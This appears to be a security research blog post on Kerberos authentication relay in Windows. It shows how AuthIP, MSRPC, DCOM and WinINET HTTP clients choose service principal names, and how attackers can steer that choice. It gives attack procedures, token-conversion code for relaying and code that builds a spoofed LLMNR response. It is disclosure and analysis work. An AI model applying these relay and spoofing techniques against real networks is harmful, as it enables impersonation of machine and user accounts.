As the only limit on basic Kerberos relay (in the absence of service protections) is the selection of the SPN, this research focuses on how common protocols select the SPN and whether it can be influenced by the attacker to achieve Kerberos authentication relay.

Kerberos Relay Requirements

It's easy to demonstrate in a controlled environment that Kerberos relay is possible. We can write a simple client which uses the Security Support Provider Interface (SSPI) APIs to communicate with the LSA and implement the network authentication. This client calls the InitializeSecurityContext API which will generate an AP_REQ authentication token containing a Kerberos Service Ticket for an arbitrary SPN. This AP_REQ can be forwarded to an intermediate server and then relayed to the service the SPN represents. You'll find this will work, assuming, to reiterate, that no service protections are in place.

However, there are some caveats in the way a client calls InitializeSecurityContext which will impact how useful the generated AP_REQ is even if the attacker can influence the SPN. If the client specifies any one of the following request flags, ISC_REQ_CONFIDENTIALITY, ISC_REQ_INTEGRITY, ISC_REQ_REPLAY_DETECT or ISC_REQ_SEQUENCE_DETECT then the generated AP_REQ will enable encryption and/or integrity checking. When the AP_REQ is received by the server using the AcceptSecurityContext API it will return a set of flags which indicate if the client enabled encryption or integrity checking. Some services use these returned flags to opportunistically enable service protections.

For example LDAP's default setting is to enable signing/encryption if the client supports it. Therefore you shouldn't be able to relay Kerberos authentication to LDAP if the client enabled any of these protections. However, other services such as HTTP don't typically support signing and sealing and so will happily accept authentication tokens which specify the request flags.
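To make the flag check concrete, here is a small C++ sketch that tests whether a set of request flags includes any of the four protection flags listed above. The constant values are the ones defined in the Windows SDK's sspi.h, repeated so that the snippet builds without Windows headers. `RequestsProtection` is a hypothetical helper, not an SSPI function.

```cpp
#include <cassert>
#include <cstdint>

// Values as defined in the Windows SDK's sspi.h, repeated here so the sketch
// builds without Windows headers.
constexpr std::uint32_t kIscReqMutualAuth      = 0x00000002;
constexpr std::uint32_t kIscReqReplayDetect    = 0x00000004;
constexpr std::uint32_t kIscReqSequenceDetect  = 0x00000008;
constexpr std::uint32_t kIscReqConfidentiality = 0x00000010;
constexpr std::uint32_t kIscReqIntegrity       = 0x00010000;

// The four request flags that turn on encryption and/or integrity checking.
constexpr std::uint32_t kProtectionFlags =
    kIscReqConfidentiality | kIscReqIntegrity |
    kIscReqReplayDetect | kIscReqSequenceDetect;

// True when the client asked for any of the protections, in which case a
// service such as LDAP with default settings would enable signing/encryption.
bool RequestsProtection(std::uint32_t isc_req_flags) {
    return (isc_req_flags & kProtectionFlags) != 0;
}
```

A client that passes only `kIscReqMutualAuth` returns false here, so its AP_REQ stays a candidate for relaying to LDAP. Adding any one of the four protection flags makes it return true.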

Another caveat is the client could specify channel binding information, typically derived from the certificate used by the TLS channel used in the communication. The channel binding information can be controlled by the attacker, but not set to arbitrary values without a bug in the TLS implementation or the code which determines the channel binding information itself.

While services have an option to only enable channel binding if it's supported by the client, all Windows Kerberos AP_REQ tokens indicate support through the KERB_AP_OPTIONS_CBT options flag in the authenticator. Sagi Sheinfeld et al did demonstrate (see slide 22 in their presentation) that if you can get the AP_REQ from a non-Windows source it will not set the options flag and so no channel binding is enforced, but that was apparently not something Microsoft will fix. It is also possible that a Windows client disables channel binding through a registry configuration option, although that seems to be unlikely in real world networks.

If the client specifies the ISC_REQ_MUTUAL_AUTH request flag when generating the initial AP_REQ it will enable mutual authentication between the client and server. The client expects to receive an Authentication Protocol Response (AP_REP) token from the server after sending the AP_REQ to prove it has possession of the shared encryption key. If the server doesn't return a valid AP_REP the client can assume it's a spoofed server and refuse to continue the communication.

From a relay perspective, mutual authentication doesn't really matter as the server is the target of the relay attack, not the client. The target server will assume the authentication has completed once it's accepted the AP_REQ, so that's all the attacker needs to forward. While the server will generate the AP_REP and return it to the attacker they can just drop it unless they need the relayed client to continue to participate in the communication for some reason.

One final consideration is that the SSPI APIs have two security packages which can be used to implement Kerberos authentication, Negotiate and Kerberos. The Negotiate protocol wraps the AP_REQ (and other authentication tokens) in the SPNEGO protocol whereas Kerberos sends the authentication tokens using a simple GSS-API wrapper (see RFC4121).

The first potential issue is Negotiate is by far the most likely package in use as it allows a network protocol the flexibility to use the most appropriate authentication protocol that the client and server both support. However, what happens if the client uses the raw Kerberos package but the server uses Negotiate?

This isn't a problem as the server implementation of Negotiate will pass the input token to the function NegpDetermineTokenPackage in lsasrv.dll during the first call to AcceptSecurityContext. This function detects if the client has passed a GSS-API Kerberos token (or NTLM) and enables a pass through mode where Negotiate gets out of the way. Therefore even if the client uses the Kerberos package you can still authenticate to the server and keep the client happy without having to extract the inner authentication token or wrap up response tokens.

One actual issue for relaying is the Negotiate protocol enables integrity protection (equivalent to passing ISC_REQ_INTEGRITY to the underlying package) so that it can generate a Message Integrity Code (MIC) for the authentication exchange to prevent tampering. Using the Kerberos package directly won't add integrity protection automatically. Therefore relaying Kerberos AP_REQs from Negotiate will likely hit issues related to automatic enabling of signing on the server. It is possible for a client to explicitly disable automatic integrity checking by passing the ISC_REQ_NO_INTEGRITY request attribute, but that's not a common case.

It's possible to disable Negotiate from the relay if the client passes an arbitrary authentication token to the first call of the InitializeSecurityContext API. On the first call the Negotiate implementation will call the NegpDetermineTokenPackage function to determine whether to enable authentication pass through. If the initial token is NTLM or looks like a Kerberos token then it'll pass through directly to the underlying security package and it won't set ISC_REQ_INTEGRITY, unless the client explicitly requested it. The byte sequence [0x00, 0x01, 0x40] is sufficient to get Negotiate to detect Kerberos, and the token is then discarded so it doesn't have to contain any further valid data.

Sniffing and Proxying Traffic

Before going into individual protocols that I've researched, it's worth discussing some more obvious ways of getting access to Kerberos authentication targeted at other services. First is sniffing network traffic sent from client to the server. For example, if the Kerberos AP_REQ is sent to a service over an unencrypted network protocol and the attacker can view that traffic the AP_REQ could be extracted and relayed. The selection of the SPN will be based on the expected traffic so the attacker doesn't need to do anything to influence it.

The Kerberos authentication protocol has protections against this attack vector. The Kerberos AP_REQ doesn't just contain the service ticket, it's also accompanied by an Authenticator which is encrypted using the ticket's session key. This key is accessible by both the legitimate client and the service. The authenticator contains a timestamp of when it was generated, and the service can check if this authenticator is within an allowable time range and whether it has seen the timestamp already. This allows the service to reject replayed authenticators by caching recently received values, and the allowable time window prevents the attacker waiting for any cache to expire before replaying.
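The replay check described above can be sketched in Python as follows. This is a simplified model, not the Windows implementation: the class name ReplayCache, the five minute window and the use of the client name plus timestamp as the cache key are all assumptions made for illustration.

```python
from datetime import datetime, timedelta, timezone


class ReplayCache:
    """Toy model of a service-side authenticator replay cache."""

    def __init__(self, max_skew=timedelta(minutes=5)):
        # Allowable difference between the authenticator timestamp and
        # the service's clock (assumed value for this sketch).
        self.max_skew = max_skew
        self._seen = set()

    def accept(self, client, timestamp, now):
        # Reject authenticators outside the allowable time window.
        if abs(now - timestamp) > self.max_skew:
            return False
        # Entries outside the window can be forgotten, because the
        # time check above would reject them anyway.
        self._seen = {e for e in self._seen
                      if abs(now - e[1]) <= self.max_skew}
        entry = (client, timestamp)
        # Reject an authenticator which has already been seen.
        if entry in self._seen:
            return False
        self._seen.add(entry)
        return True
```

The two rejection paths work together: the cache only has to remember values for as long as the time window would still accept them.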

What this means is that while an attacker could sniff the Kerberos authentication on the wire and relay it, if the service has already received the authenticator it would be rejected as being a replay. The only way to exploit it would be to somehow prevent the legitimate authentication request from reaching the service, or race the request so that the attacker's packet is processed first.

Note, RFC4120 mentions the possibility of embedding the client's network address in the authenticator so that the service could reject authentication coming from the wrong host. This isn't used by the Windows Kerberos implementation as far as I can tell. No doubt it would cause too many false positives for the replay protection in anything but the simplest enterprise networks.

Therefore the only reliable way to exploit this scenario would be to actively interpose on the network communications between the client and service. This is of course practical and has been demonstrated many times assuming the traffic isn't protected using something like TLS with server verification. Various attacks would be possible such as ARP or DNS spoofing attacks or HTTP proxy redirection to perform the interposition of the traffic.

However, active MitM of protocols is a known risk and therefore an enterprise might have technical defenses in place to mitigate the issue. Of course, if such enterprises have enabled all the recommended relay protections, it's a moot point. Regardless, we'll assume that MitM is impractical for existing services due to protections in place and consider how individual protocols handle SPN selection.

IPSec and AuthIP

My research into Kerberos authentication relay came about in part because I was looking into the implementation of IPSec on Windows as part of my firewall research. Specifically I was researching the AuthIP ISAKMP which allows for Windows authentication protocols to be used to establish IPsec Security Associations.

I noticed that the AuthIP protocol has a GSS-ID payload which can be sent from the server to the client. This payload contains the textual SPN to use for the Kerberos authentication during the AuthIP process. This SPN is passed verbatim to the SSPI InitializeSecurityContext call by the AuthIP client.

As no verification is done on the format of the SPN in the GSS-ID payload, it allows the attacker to fully control the values including the service class and instance name. Therefore if an attacker can induce a domain joined machine to connect to an attacker controlled service and negotiate AuthIP then a Kerberos AP_REQ for an arbitrary SPN can be captured for relay use. As this AP_REQ is never sent to the target of the SPN it will not be detected as a replay.

Inducing authentication isn't necessarily difficult. Any IP traffic which is covered by the domain configured security connection rules will attempt to perform AuthIP. For example it's possible that a UDP response for a DNS request from the domain controller might be sufficient. AuthIP supports two authenticated users, the machine and the calling user. By default it seems the machine authenticates first, so if you convinced a Domain Controller to authenticate you'd get the DC computer account which could be fairly exploitable.

For interest's sake, the SPN is also used to determine the computer account associated with the server. This computer account is then used with Service For User (S4U) to generate a local access token allowing the client to determine the identity of the server. However I don't think this is that useful as the fake server can't complete the authentication and the connection will be discarded.

The security connection rules use IP address ranges to determine what hosts need IPsec authentication. If these address ranges are too broad it's also possible that ISAKMP AuthIP traffic might leak to external networks. For example if the rules don't limit the network ranges to the enterprise's addresses, then even a connection out to a public service could be accompanied by the ISAKMP AuthIP packet. This can be then exploited by an attacker who is not co-located on the enterprise network just by getting a client to connect to their server, such as through a web URL.

Diagram of a relay using a fake AuthIP server

To summarize the attack process from the diagram:

  1. Induce a client computer to send some network traffic to EVILHOST. It doesn't really matter what the traffic is, only that the IP address, type and port must match an IP security connection rule to use AuthIP. EVILHOST does not need to be domain joined to perform the attack.
  2. The network traffic will get the Windows IPsec client to try to establish a security association with EVILHOST.
  3. A fake AuthIP server on EVILHOST receives the request to establish a security association and returns a GSS-ID payload. This payload contains the target SPN, for example CIFS/FILESERVER.
  4. The IPsec client uses the SPN to create an AP_REQ token and sends it to EVILHOST.
  5. EVILHOST relays the Kerberos AP_REQ to the target service on FILESERVER.

Relaying this AuthIP authentication isn't ideal from an attacker's perspective. As the authentication will be used to sign and seal the network traffic, the request context flags for the call to InitializeSecurityContext will require integrity and confidentiality protection. For network protocols such as LDAP which default to requiring signing and sealing if the client supports it, this would prevent the relay attack from working. However if the service ignores the protection and doesn't have any further checks in place this would be sufficient.

This issue was reported to MSRC and assigned case number 66900. However Microsoft have indicated that it will not be fixed with a security bulletin. I've described Microsoft's rationale for not fixing this issue later in the blog post. If you want to reproduce this issue there are details on Project Zero's issue tracker.

MSRPC

After discovering that AuthIP could allow for authentication relay, the next protocol I looked at was MSRPC. The protocol supports NTLM, Kerberos or Negotiate authentication protocols over connected network transports such as named pipes or TCP. These authentication protocols need to be opted into by the server using the RpcServerRegisterAuthInfo API by specifying the authentication service constants of RPC_C_AUTHN_WINNT, RPC_C_AUTHN_GSS_KERBEROS or RPC_C_AUTHN_GSS_NEGOTIATE respectively. When registering the authentication information the server can optionally specify the SPN that needs to be used by the client.

However, this SPN isn't actually used by the RPC server itself. Instead it's registered with the runtime, and a client can query the server's SPN using the RpcMgmtInqServerPrincName management API. Once the SPN is queried the client can configure its authentication for the connection using the RpcBindingSetAuthInfo API. However, this isn't required; the client could just generate the SPN manually and set it. If the client doesn't call RpcBindingSetAuthInfo then it will not perform any authentication on the RPC connection.

As an aside, curiously, when a connection is made the server can query the client's authentication information using the RpcBindingInqAuthClient API. However, the SPN that this API returns is the one registered by RpcServerRegisterAuthInfo and NOT the one which was used by the client to authenticate. Microsoft does also mention the call to RpcMgmtInqServerPrincName in the "Writing a secure RPC client or server" section on MSDN. However, they frame it in the context of mutual authentication and not as protection against a relay attack.

If a client queries for the SPN from a malicious RPC server it will authenticate using a Kerberos AP_REQ for an SPN fully under the attacker's control. Whether the AP_REQ has integrity or confidentiality enabled depends on the authentication level set during the call to RpcBindingSetAuthInfo. If this is set to RPC_C_AUTHN_LEVEL_CONNECT and the client uses RPC_C_AUTHN_GSS_KERBEROS then the AP_REQ won't have integrity enabled. However, if Negotiate is used or anything above RPC_C_AUTHN_LEVEL_CONNECT as a level is used then it will have the integrity/confidentiality flags set.
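The rule in the previous paragraph can be written down as a small Python predicate. The numeric constants are assumed to match the Windows SDK header rpcdce.h, and the function name is hypothetical; the logic covers only the cases the text describes.

```python
# Authentication service and level values assumed to match rpcdce.h.
RPC_C_AUTHN_GSS_NEGOTIATE = 9
RPC_C_AUTHN_GSS_KERBEROS = 16
RPC_C_AUTHN_LEVEL_CONNECT = 2
RPC_C_AUTHN_LEVEL_PKT_INTEGRITY = 5
RPC_C_AUTHN_LEVEL_PKT_PRIVACY = 6


def ap_req_is_protected(authn_svc: int, authn_level: int) -> bool:
    """Predict whether the AP_REQ has integrity/confidentiality flags set."""
    if authn_svc not in (RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_GSS_KERBEROS):
        raise ValueError("only Negotiate and Kerberos are covered here")
    if authn_level < RPC_C_AUTHN_LEVEL_CONNECT:
        raise ValueError("levels below CONNECT are not covered here")
    # Negotiate always results in the protection flags being set.
    if authn_svc == RPC_C_AUTHN_GSS_NEGOTIATE:
        return True
    # Raw Kerberos is only unprotected at exactly the CONNECT level.
    return authn_level > RPC_C_AUTHN_LEVEL_CONNECT
```

Only the combination of RPC_C_AUTHN_GSS_KERBEROS and RPC_C_AUTHN_LEVEL_CONNECT returns False, which is the combination of most interest for relaying.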

Doing a quick scan in system32 the following DLLs call the RpcMgmtInqServerPrincName API: certcli.dll, dot3api.dll, dusmsvc.dll, FrameServerClient.dll, L2SecHC.dll, luiapi.dll, msdtcprx.dll, nlaapi.dll, ntfrsapi.dll, w32time.dll, WcnApi.dll, WcnEapAuthProxy.dll, WcnEapPeerProxy.dll, witnesswmiv2provider.dll, wlanapi.dll, wlanext.exe, WLanHC.dll, wlanmsm.dll, wlansvc.dll, wwansvc.dll, wwapi.dll. Some basic analysis shows that none of these clients check the value of the SPN and use it verbatim with RpcBindingSetAuthInfo. That said, they all seem to use RPC_C_AUTHN_GSS_NEGOTIATE and set the authentication level to RPC_C_AUTHN_LEVEL_PKT_PRIVACY which makes them less useful as an attack vector.

If the client specifies RPC_C_AUTHN_GSS_NEGOTIATE but does not specify an SPN then the runtime generates one automatically. This is based on the target hostname with the RestrictedKrbHost service class. The runtime doesn't process the hostname; it just concatenates the strings. For some reason the runtime doesn't support generating the SPN for RPC_C_AUTHN_GSS_KERBEROS.

One additional quirk of the RPC runtime is that the request attribute flag ISC_REQ_USE_DCE_STYLE is used when calling InitializeSecurityContext. This enables a special three-leg authentication mode which results in the server sending back an AP_REP and then receiving another AP_REP from the client. Until that third-leg AP_REP has been provided to the server it won't consider the authentication complete, so it's not sufficient to just forward the initial AP_REQ token and close the connection to the client. This makes the relay code slightly more complex, but not impossible.

A second change that ISC_REQ_USE_DCE_STYLE introduces is that the Kerberos AP_REQ token does not have a GSS-API wrapper. This causes the call to NegpDetermineTokenPackage to fail to detect the package in use, making it impossible to directly forward the traffic to a server using the Negotiate package. However, this prefix is not protected against modification so the relay code can prepend the appropriate value before forwarding to the server. For example the following C# code can be used to convert a DCE style AP_REQ to a GSS-API format which Negotiate will accept.

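// Requires: using System; using System.IO;

// Encode a length using the ASN.1 DER definite-length rules.
public static byte[] EncodeLength(int length)
{
    // Short form: a single byte holds lengths below 0x80.
    if (length < 0x80)
        return new byte[] { (byte)length };
    // Long form: 0x81 is followed by one length byte.
    if (length < 0x100)
        return new byte[] { 0x81, (byte)length };
    // Long form: 0x82 is followed by two big-endian length bytes.
    if (length < 0x10000)
        return new byte[] { 0x82, (byte)(length >> 8),
                            (byte)(length & 0xFF) };
    throw new ArgumentException("Invalid length", nameof(length));
}

// Wrap a DCE style AP_REQ in a GSS-API header. Any other token is
// returned unchanged.
public static byte[] ConvertApReq(byte[] token)
{
    // A raw AP_REQ starts with the ASN.1 tag 0x6E ([APPLICATION 14]).
    if (token.Length == 0 || token[0] != 0x6E)
        return token;
    MemoryStream stm = new MemoryStream();
    BinaryWriter writer = new BinaryWriter(stm);
    Console.WriteLine("Converting DCE AP_REQ to GSS-API format.");
    // Kerberos 5 mechanism OID (1.2.840.113554.1.2.2) followed by the
    // two byte AP_REQ token ID (0x01, 0x00).
    byte[] header = new byte[] { 0x06, 0x09, 0x2a, 0x86, 0x48,
       0x86, 0xf7, 0x12, 0x01, 0x02, 0x02, 0x01, 0x00 };
    // 0x60 is the GSS-API initial context token tag ([APPLICATION 0]).
    writer.Write((byte)0x60);
    writer.Write(EncodeLength(header.Length + token.Length));
    writer.Write(header);
    writer.Write(token);
    return stm.ToArray();
}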

Subsequent tokens in the authentication process don't need to be wrapped; in fact, wrapping them with their GSS-API headers will cause the authentication to fail. Relaying MSRPC requests would probably be difficult just due to the relative lack of clients which request the server's SPN. Also when the SPN is requested it tends to be a conscious act of securing the client and so best practice tends to require the developer to set the maximum authentication level, making the Kerberos AP_REQ less useful.
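For readers scripting a relay in Python, a minimal sketch of the same GSS-API wrapping, together with a matching unwrap that is handy for checking the result, might look like the following. The function names are hypothetical and the parsing assumes a well-formed token; it is not a general ASN.1 decoder.

```python
# Kerberos 5 mechanism OID (1.2.840.113554.1.2.2) followed by the
# two byte AP_REQ token ID.
KRB5_HEADER = bytes([0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x12,
                     0x01, 0x02, 0x02, 0x01, 0x00])


def encode_length(length: int) -> bytes:
    """Encode a DER definite length."""
    if length < 0:
        raise ValueError("length must not be negative")
    if length < 0x80:
        return bytes([length])
    count = (length.bit_length() + 7) // 8
    return bytes([0x80 | count]) + length.to_bytes(count, "big")


def wrap_ap_req(token: bytes) -> bytes:
    """Add the GSS-API wrapper to a DCE style AP_REQ."""
    if not token or token[0] != 0x6E:
        return token  # Not a raw AP_REQ, leave untouched.
    body = KRB5_HEADER + token
    return b"\x60" + encode_length(len(body)) + body


def unwrap_ap_req(token: bytes) -> bytes:
    """Strip the GSS-API wrapper, returning the inner AP_REQ."""
    if not token or token[0] != 0x60:
        return token  # No wrapper present.
    first = token[1]
    if first < 0x80:
        offset, length = 2, first
    else:
        count = first & 0x7F
        length = int.from_bytes(token[2:2 + count], "big")
        offset = 2 + count
    body = token[offset:offset + length]
    if not body.startswith(KRB5_HEADER):
        raise ValueError("not a Kerberos AP_REQ GSS-API token")
    return body[len(KRB5_HEADER):]
```

Only the first token from the client should be passed through wrap_ap_req; as noted above, wrapping later tokens causes the authentication to fail.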

DCOM

The DCOM protocol uses MSRPC under the hood to access remote COM objects, therefore it should have the same behavior as MSRPC. The big difference is DCOM is designed to automatically handle the authentication requirements of a remote COM object through binding information contained in the DUALSTRINGARRAY returned during Object Exporter ID (OXID) resolving. Therefore the client doesn't need to explicitly call RpcBindingSetAuthInfo to configure the authentication.

The binding information contains the protocol sequence and endpoint to use (such as TCP on port 30000) as well as the security bindings. Each security binding contains the RPC authentication service (wAuthnSvc in the below screenshot) to use as well as an optional SPN (aPrincName) for the authentication. Therefore a malicious DCOM server can force the client to use the RPC_C_AUTHN_GSS_KERBEROS authentication service with a completely arbitrary SPN by returning an appropriate security binding.

Screenshot of part of the MS-DCOM protocol documentation showing the SECURITYBINDING structure

The authentication level chosen by the client depends on the value of the dwAuthnLevel parameter specified if the COM client calls the CoInitializeSecurity API. If the client doesn't explicitly call CoInitializeSecurity then a default will be used which is currently RPC_C_AUTHN_LEVEL_CONNECT. This means neither integrity nor confidentiality will be enforced on the Kerberos AP_REQ by default.

One limitation is that without a call to CoInitializeSecurity, the default impersonation level for the client is set to RPC_C_IMP_LEVEL_IDENTIFY. This means the access token generated by the DCOM RPC authentication can only be used for identification and not for impersonation. For some services this isn't an issue, for example LDAP doesn't need an impersonation level token. However for others such as SMB this would prevent access to files. It's possible that you could find a COM client which sets both RPC_C_AUTHN_LEVEL_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE though there's no trivial process to assess that.

Getting a client to connect to the server isn't trivial as DCOM isn't a widely used protocol on modern Windows networks due to high authentication requirements. However, one use case for this is local privilege escalation. For example you could get a privileged service to connect to the malicious COM server and relay the computer account Kerberos AP_REQ which is generated. I have a working PoC for this which allows a local non-admin user to connect to the domain's LDAP server using the local computer's credentials.

This attack is somewhat similar to the RemotePotato attack (which uses NTLM rather than Kerberos) which again Microsoft have refused to fix. I'll describe this in more detail in a separate blog post after this one.

HTTP

HTTP has supported NTLM and Negotiate authentication for a long time (see this draft from 2002 although the most recent RFC is 4559 from 2006). To initiate a Windows authentication session the server can respond to a request with the status code 401 and specify a WWW-Authenticate header with the value Negotiate. If the client supports Windows authentication it can use InitializeSecurityContext to generate a token, convert the binary token into a Base64 string and send it in the next request to the server with the Authorization header. This process is repeated until the client errors or the authentication succeeds.
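The header handling in this exchange is simple enough to sketch in Python. The helper names below are hypothetical, and the sketch only covers the Base64 framing of the token, not the generation of the token itself.

```python
import base64


def parse_www_authenticate(value: str):
    """Split a WWW-Authenticate value into (scheme, binary token)."""
    scheme, _, rest = value.strip().partition(" ")
    rest = rest.strip()
    # The initial 401 challenge carries only the scheme name.
    token = base64.b64decode(rest) if rest else b""
    return scheme, token


def build_authorization(token: bytes, scheme: str = "Negotiate") -> str:
    """Build the Authorization header value for an authentication token."""
    return f"{scheme} {base64.b64encode(token).decode('ascii')}"
```

A relay sitting in the position of the HTTP server would decode the token from the client's Authorization header in the same way before forwarding the raw bytes to the target service.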

In theory only NTLM and Negotiate are defined but a HTTP implementation could use other Windows authentication packages such as Kerberos if it so chose to. Whether the HTTP client will automatically use the user's credentials is up to the user agent or the developer using it as a library.

All the major browsers support both authentication types, as do many non-browser HTTP user agents such as those in .NET and WinHTTP. I looked at the following implementations, all running on Windows 10 21H1:

  • WinINET (Internet Explorer 11)
  • WinHTTP (WebClient)
  • Chromium M93 (Chrome and Edge)
  • Firefox 91
  • .NET Framework 4.8
  • .NET 5.0 and 6.0

This is of course not an exhaustive list, and there's likely to be many different HTTP clients in Windows which might have different behaviors. I've also not looked at how non-Windows clients work in this regard.

There are two important behaviors that I wanted to assess with HTTP. First is how the user agent determines when to perform automatic Windows authentication using the current user's credentials. In order to relay the authentication it can't ask the user for their credentials. And second we want to know how the SPN is selected by the user agent when calling InitializeSecurityContext.

WinINET (Internet Explorer 11)

WinINET can be used as a generic library to handle HTTP connections and authentication. There's likely many different users of WinINET but we'll just look at Internet Explorer 11 as that is what it's most known for. WinINET is also the originator of HTTP Negotiate authentication, so it's good to get a baseline of what WinINET does in case other libraries just copied its behavior.

First, how does WinINET determine when it should handle Windows authentication automatically? By default this is based on whether the target host is considered to be in the Intranet Zone. This means any host which bypasses the configured HTTP proxy or uses an undotted name will be considered Intranet zone and WinINET will automatically authenticate using the current user's credentials.

It's possible to disable this behavior by changing the security options for the Intranet Zone to "Prompt for user name and password", as shown below:

Screenshot of the system Internet Options Security Settings showing how to disable automatic authentication

Next, how does WinINET determine the SPN to use for Negotiate authentication? RFC4559 says the following:

'When the Kerberos Version 5 GSSAPI mechanism [RFC4121] is being used, the HTTP server will be using a principal name of the form of "HTTP/hostname"'

You might assume therefore that the HTTP URL that WinINET is connecting to would be sufficient to build the SPN: just use the hostname as provided and combine with the HTTP service class. However it turns out that's not entirely the case. I found a rough description of how IE and WinINET actually generate the SPN in this blog. This blog post is over 10 years old so it was possible that things had changed; however, that turns out not to be the case.

The basic approach is that WinINET doesn't necessarily trust the hostname specified in the HTTP URL. Instead it requests the canonical name of the server via DNS. It doesn't seem to explicitly request a CNAME record from the DNS server. Instead it calls getaddrinfo and specifies the AI_CANONNAME hint. Then it uses the returned value of ai_canonname and prefixes it with the HTTP service class. In general ai_canonname is the name provided by the DNS server in the returned A/AAAA record.

For example, if the HTTP URL is http://fileserver.domain.com, but the DNS A record contains the canonical name example.domain.com, the generated SPN is HTTP/example.domain.com and not HTTP/fileserver.domain.com. Therefore, to provide an arbitrary SPN, the name in the DNS address record needs to identify a different host from the one its IP address points to, so that IE will connect to a server we control while generating Kerberos authentication for a different target name.
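The SPN construction described above can be approximated in Python using the same getaddrinfo hint. This is a sketch of the idea rather than WinINET's actual code; the function names are hypothetical and the fallback to the original hostname when no canonical name is returned is an assumption.

```python
import socket


def build_http_spn(canonical_name: str) -> str:
    """Prefix a canonical host name with the HTTP service class."""
    return "HTTP/" + canonical_name


def resolve_canonical_name(hostname: str) -> str:
    """Ask the resolver for the canonical name of a host."""
    results = socket.getaddrinfo(hostname, None, flags=socket.AI_CANONNAME)
    # Each result is (family, type, proto, canonname, sockaddr); the
    # canonical name is reported in the first entry.
    canonname = results[0][3]
    return canonname or hostname
```

Calling build_http_spn(resolve_canonical_name("fileserver.domain.com")) on a network where the resolver reports example.domain.com as the canonical name would produce HTTP/example.domain.com, matching the example in the text.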

The most obvious technique would be to specify a DNS CNAME record which redirects to another hostname. However, at least if the client is using a Microsoft DNS server (which is likely for a domain environment) then the CNAME record is not directly returned to the client. Instead the DNS server will perform a recursive lookup, and then return the CNAME along with the validated address record to the client.

Therefore, if an attacker sets up a CNAME record for www.evil.com which redirects to fileserver.domain.com, the DNS server will return the CNAME record and an address record for the real IP address of fileserver.domain.com. WinINET will then try to connect to the HTTP service on fileserver.domain.com rather than on www.evil.com, whereas the attack needs the connection to go to the attacker's server.

I tried various ways of tricking the DNS client into making a direct request to a DNS server I controlled but I couldn't seem to get it to work. However, it turns out there is a way to get the DNS resolver to accept arbitrary DNS responses, via local DNS resolution protocols such as Multicast DNS (MDNS) and Link-Local Multicast Name Resolution (LLMNR).

These two protocols use a lightly modified DNS packet structure, so you can return a response to the name resolution request with an address record with the IP address of the malicious web server, but the canonical name of any server. WinINET will then make the HTTP connection to the malicious web server but construct the SPN for the spoofed canonical name. I've verified this with LLMNR and in theory MDNS should work as well.

Is spoofing the canonical name a bug in the Windows DNS client resolver? I don't believe any DNS protocol requires the query name to exactly match the answer name. If the DNS server has a CNAME record for the queried host then there's no obvious requirement for it to return that record when it could just return the address record. Of course if a public DNS server could spoof a host for a DNS zone which it didn't control, that'd be a serious security issue. It's also worth noting that this doesn't spoof the name generally. As the cached DNS entry on Windows is based on the query name, if the client now resolves fileserver.domain.com a new DNS request will be made and the DNS server would return the real address.

Attacking local name resolution protocols is a well known weakness abused for MitM attacks, so it's likely that some security conscious networks will disable the protocols. However, the advantage of using LLMNR this way over its use for MitM is that the resolved name can be anything. Normally you'd want to spoof the DNS name of an existing host; in our example you'd spoof the request for the fileserver name. But for registered computers on the network the DNS client will usually satisfy the name resolution via the network's DNS server before ever trying local DNS resolution. Therefore local DNS resolution would never be triggered and it wouldn't be possible to spoof it. For relaying Kerberos authentication we don't care: you can induce a client to connect to an unregistered host name, which will fall back to local DNS resolution.

The big problem with the local DNS resolution attack vector is that the attacker must be in the same multicast domain as the victim computer. However, the attacker can still start the process by getting a user to connect to an external domain which looks legitimate then redirect to an undotted name to both force automatic authentication and local DNS resolving.

Diagram of the local DNS resolving attack against WinINET

To summarize the attack process as shown in the above diagram:

  1. The attacker sets up an LLMNR service on a machine in the same multicast domain as the victim computer. The attacker listens for a target name request such as EVILHOST.
  2. Trick the victim to use IE (or another WinINET client, such as via a document format like DOCX) to connect to the attacker's server on http://EVILHOST.
  3. The LLMNR server receives the lookup request and responds by setting the address record's hostname to the SPN target host to spoof and the IP address to the attacker-controlled server.
  4. The WinINET client extracts the spoofed canonical name, prefixes it with the HTTP service class to form the SPN and requests the Kerberos service ticket. This Kerberos ticket is then sent to the attacker's HTTP service.
  5. The attacker receives the Negotiate/Kerberos authentication for the spoofed SPN and relays it to the real target server.

An example LLMNR response decoded by Wireshark for the name evilhost (with IP address 10.0.0.80), spoofing fileserver.domain.com (which is not address 10.0.0.80) is shown below:

Link-local Multicast Name Resolution (response)
    Transaction ID: 0x910f
    Flags: 0x8000 Standard query response, No error
    Questions: 1
    Answer RRs: 1
    Authority RRs: 0
    Additional RRs: 0
    Queries
        evilhost: type A, class IN
            Name: evilhost
            [Name Length: 8]
            [Label Count: 1]
            Type: A (Host Address) (1)
            Class: IN (0x0001)
    Answers
        fileserver.domain.com: type A, class IN, addr 10.0.0.80
            Name: fileserver.domain.com
            Type: A (Host Address) (1)
            Class: IN (0x0001)
            Time to live: 1 (1 second)
            Data length: 4
            Address: 10.0.0.80
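To make the packet layout concrete, the decoded response above can be reassembled byte for byte with a few lines of Python. This sketch only encodes the message shown (one question, one A record answer, no name compression); the function names are hypothetical and it does no network I/O.

```python
import socket
import struct


def encode_name(name: str) -> bytes:
    """Encode a host name as length-prefixed DNS labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("label must be 1 to 63 bytes long")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"  # Root label terminates the name.


def build_response(txid: int, query_name: str, answer_name: str,
                   address: str, ttl: int = 1) -> bytes:
    """Build a response whose answer name differs from the query name."""
    # ID, flags (0x8000 = response, no error), 1 question, 1 answer,
    # 0 authority records, 0 additional records.
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    # Question: name, type A (1), class IN (1).
    question = encode_name(query_name) + struct.pack("!HH", 1, 1)
    rdata = socket.inet_aton(address)
    # Answer: name, type A, class IN, TTL, data length, address.
    answer = (encode_name(answer_name)
              + struct.pack("!HHIH", 1, 1, ttl, len(rdata))
              + rdata)
    return header + question + answer
```

Passing 0x910F, "evilhost", "fileserver.domain.com" and "10.0.0.80" reproduces the fields in the Wireshark decode, with the question and answer sections carrying different names.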

